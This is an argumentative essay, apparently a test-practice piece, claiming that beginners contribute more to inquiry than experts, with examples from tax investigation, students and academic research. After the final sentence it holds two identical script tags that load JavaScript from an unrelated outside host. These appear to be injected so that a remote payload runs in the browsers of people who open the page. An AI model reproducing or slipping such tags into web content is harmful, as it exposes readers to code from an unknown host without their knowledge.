In any field of inquiry the beginner is more likely than the expert to make important contributions

Field of inquiry needs very open mindset, curiosity to know things and excessive passion to unfold the facts. The young minds are generally very excited and handles each problem differently than the ones those are experienced in any field. They are not bound to be follow any procedure or structure to get the answers of their question. While more experienced ones are the one who have many years of experience and thus they are bound to adopt the old methods, which they think will work as its tried and tested.

The reason why the beginner outperforms the experienced one is due to their way to approach the problem, especially where inquiry or investigation is involved. Because they do not follow a certain method to their answers, the person whom they inquire does not know how he/she is going to interact and behave with them, they are puzzled on how to react to their interrogation. For instance, Shri Manoj Sharma, who became IPS officer at very young age, was able to uncover the false impression of many well-known business men. He was income tax officer and he outperformed from many of his seniors, because of his unpredictable way of investigation. He did not have structured way of interrogating the culprit, but he was flexible in adopting the different ways for different personalities.

Moreover, the inexperienced ones are usually more adoptable to different methods. One can teach them certain tactics or tricks and they are likely to learn and incorporate those learning into their investigation easily as compared to the more experienced ones. The are generally good learners. For example, the curious students are learning the concept for the first are generally more quicker to learn and ask ample of doubts or questions to their tutor. The students who know the concepts already accepts it and do not raise questions on how certain things happen in certain way only. In fact, this is the best analogy for one to understand that if you are new to something you will have more questions or you will inquire more than the one who already knows about it. Therefore, beginner is most suited in field of inquiry than experienced ones in most of the areas.

In addition, in the field of academics there are times when relatively new people in the given research area performs better than other. The reason for this is that they ask more questions and thus they in turn find answer to the more question which ultimately help them decode mysteries in their area which lead to noteworthy innovation.

Of course, this theory is not applicable in all fields. In corporates generally senior ones are paid higher than junior because they are prudent and well-versed with their work. Also, they are capable enough to ask right questions which is not possible for the interns or juniors.
In conclusion, in the field where more inquiry is involved, the fresh minds are better suited because of their inherent skill set as compared to more experienced ones. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
